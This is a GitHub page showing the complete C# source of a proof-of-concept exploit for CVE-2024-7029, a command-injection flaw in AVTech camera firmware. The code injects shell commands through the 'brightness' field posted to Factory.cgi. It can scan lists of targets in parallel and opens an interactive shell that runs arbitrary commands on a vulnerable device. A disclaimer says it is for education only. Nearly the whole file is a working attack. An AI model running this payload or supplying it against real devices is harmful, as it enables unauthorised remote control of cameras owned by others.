forked from ebrasha/CVE-2024-7029
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathProgram.cs
More file actions
261 lines (236 loc) · 9.96 KB
/
Program.cs
File metadata and controls
261 lines (236 loc) · 9.96 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
using System;
using System.IO;
using System.Net.Http;
using System.Threading.Tasks;
using System.Collections.Generic;
using System.Threading;
namespace PocCVE20247029
{
class Program
{
private static readonly string path = "/cgi-bin/supervisor/Factory.cgi";
private static readonly HttpClient client = new HttpClient();
static async Task Main(string[] args)
{
DisplayDisclaimer();
Console.Write("Do you agree with the disclaimer? (y/n): ");
if (Console.ReadLine()?.ToLower() != "y")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("You must agree to the disclaimer to proceed.");
Console.ResetColor();
Console.ReadLine();
return;
}
DisplayBanner();
string url = null;
string file = null;
int threads = 10;
// Check if arguments were provided, otherwise ask the user
if (args.Length == 0)
{
Console.Write("Please enter the target URL (leave empty to use a file): ");
url = Console.ReadLine();
if (string.IsNullOrEmpty(url))
{
Console.Write("Please enter the path to the file containing target URLs: ");
file = Console.ReadLine();
}
Console.Write("Enter the number of threads to use (default is 10): ");
var threadsInput = Console.ReadLine();
if (!string.IsNullOrEmpty(threadsInput) && int.TryParse(threadsInput, out int t))
{
threads = t;
}
}
else
{
foreach (var arg in args)
{
if (arg.StartsWith("-u="))
{
url = arg.Substring(3);
}
else if (arg.StartsWith("-f="))
{
file = arg.Substring(3);
}
else if (arg.StartsWith("-t="))
{
if (int.TryParse(arg.Substring(3), out int t))
{
threads = t;
}
}
}
}
// Check if the URL or file was provided either via arguments or user input
if (!string.IsNullOrEmpty(url))
{
var exploit = new AvTechExploit(url, threads);
await exploit.Scanner();
await exploit.InteractiveShell(); // Shell interactive
}
else if (!string.IsNullOrEmpty(file))
{
var exploit = new AvTechExploit(null, file, threads);
await exploit.ScanFile();
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[-] No target URL or file was specified.");
Console.ResetColor();
ShowHelp();
}
}
private static void DisplayDisclaimer()
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("============================================");
Console.WriteLine(" DISCLAIMER: ");
Console.WriteLine(" POC: Abdal CVE-2024-7029 by EbraSha");
Console.WriteLine(" This Proof of Concept (PoC) is for educational purposes only.");
Console.WriteLine(" Unauthorized use of this software on systems you do not own or");
Console.WriteLine(" have explicit permission to test is illegal and unethical.");
Console.WriteLine(" Users must comply with all applicable laws and regulations.");
Console.WriteLine(" The developer assumes no responsibility for misuse or damage.");
Console.WriteLine("============================================");
Console.ResetColor();
Console.WriteLine();
}
private static void DisplayBanner()
{
Console.ForegroundColor = ConsoleColor.White;
Console.WriteLine("============================================");
Console.WriteLine(" Abdal CVE-2024-7029 Ver 1.0 ");
Console.WriteLine(" PoC: Ebrahim Shafiei (EbraSha) ");
Console.WriteLine(" Telegram: https://t.me/ProfShafiei ");
Console.WriteLine(" Email: Prof.Shafiei@gmail.com ");
Console.WriteLine(" Vulnerability ID: CVE-2024-7029 ");
Console.WriteLine("============================================");
Console.ResetColor();
Console.WriteLine();
}
private static void ShowHelp()
{
Console.ForegroundColor = ConsoleColor.Blue;
Console.WriteLine("Usage:");
Console.WriteLine(" -u=<url> Target URL to exploit");
Console.WriteLine(" -f=<file> File containing target URLs");
Console.WriteLine(" -t=<threads> Number of threads for scanning (default 10)");
Console.ResetColor();
}
public class AvTechExploit
{
private readonly string target;
private readonly string targetFile;
private readonly int threads;
public AvTechExploit(string target, int threads)
{
this.target = target;
this.threads = threads;
}
public AvTechExploit(string target, string targetFile, int threads)
{
this.targetFile = targetFile;
this.threads = threads;
}
public async Task Scanner()
{
Console.ForegroundColor = ConsoleColor.Cyan;
Console.WriteLine("[*] Checking if the target is vulnerable");
Console.ResetColor();
await CheckVuln(target);
}
public async Task ScanFile()
{
try
{
var targets = await File.ReadAllLinesAsync(targetFile);
using var semaphore = new SemaphoreSlim(threads);
var tasks = new List<Task>();
foreach (var target in targets)
{
await semaphore.WaitAsync();
tasks.Add(Task.Run(async () =>
{
await CheckVuln(target);
semaphore.Release();
}));
}
await Task.WhenAll(tasks);
}
catch (Exception ex)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine($"[-] Error scanning from file: {ex.Message}");
Console.ResetColor();
}
}
private async Task CheckVuln(string target)
{
try
{
var test = "action=white_led&brightness=$(echo%20GDHAiwhsHWhswHSKA 2>&1) #";
var content = new StringContent(test, System.Text.Encoding.UTF8,
"application/x-www-form-urlencoded");
var response = await client.PostAsync(target + path, content);
var responseText = await response.Content.ReadAsStringAsync();
if (responseText.Contains("GDHAiwhsHWhswHSKA"))
{
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine($"[+] The target is vulnerable: {target}");
Console.ResetColor();
}
else
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine($"[-] The target is not vulnerable: {target}");
Console.ResetColor();
}
}
catch (Exception ex)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine($"[-] Error checking target {target}: {ex.Message}");
Console.ResetColor();
}
}
public async Task Exploit(string cmd)
{
var data = $"action=white_led&brightness=$({cmd} 2>&1) #";
var content = new StringContent(data, System.Text.Encoding.UTF8, "application/x-www-form-urlencoded");
try
{
var response = await client.PostAsync(target + path, content);
var responseText = await response.Content.ReadAsStringAsync();
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine($"[+] Command output: {responseText}");
Console.ResetColor();
}
catch (Exception ex)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine($"[-] Error during exploitation: {ex.Message}");
Console.ResetColor();
}
}
public async Task InteractiveShell()
{
Console.ForegroundColor = ConsoleColor.Cyan;
Console.WriteLine("[*] Initiating interactive shell. Type 'exit' to quit.");
Console.ResetColor();
while (true)
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.Write("Shell> ");
Console.ResetColor();
var cmd = Console.ReadLine();
if (cmd.ToLower() == "exit") break;
await Exploit(cmd);
}
}
}
}
}